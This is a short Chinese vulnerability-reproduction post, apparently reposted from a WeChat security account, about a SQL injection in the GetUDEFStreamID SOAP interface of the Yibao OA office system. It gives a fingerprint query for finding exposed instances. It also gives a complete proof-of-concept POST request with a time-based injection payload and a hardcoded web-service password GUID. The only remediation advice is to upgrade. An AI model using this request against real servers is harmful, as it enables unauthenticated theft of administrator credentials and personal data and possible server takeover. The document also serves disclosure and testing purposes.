易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台,具有信息管理、 流程管理 、知识管理(档案和业务管理)、协同办公等多种功能。系统内置了多种流程模板,如请假、报销、采购等,企业可以根据自身需求进行定制和优化,实现流程的自动化和规范化管理。支持档案和业务管理,包括知识文档的上传、分类、搜索和分享,有助于企业建立知识库,提高员工的知识水平和业务能力。还具备人事管理、日程安排、邮件通知等多种功能,能够满足企业日常办公的多样化需求。
易宝OA GetUDEFStreamID 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
app="顶讯科技-易宝OA系统"
POST /WebService/BasicService.asmx HTTP/1.1Host:Content-Type: text/xml; charset=utf-8Content-Length: lengthSOAPAction: "http://tempuri.org/GetUDEFStreamID"<soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUDEFStreamIDxmlns="http://tempuri.org/"><tableName>';WAITFOR DELAY '0:0:5'--</tableName><webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword></GetUDEFStreamID></soap:Body></soap:Envelope>
延时
升级至安全版本
原文始发于微信公众号(冷漠安全):「漏洞复现」易宝OA GetUDEFStreamID SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论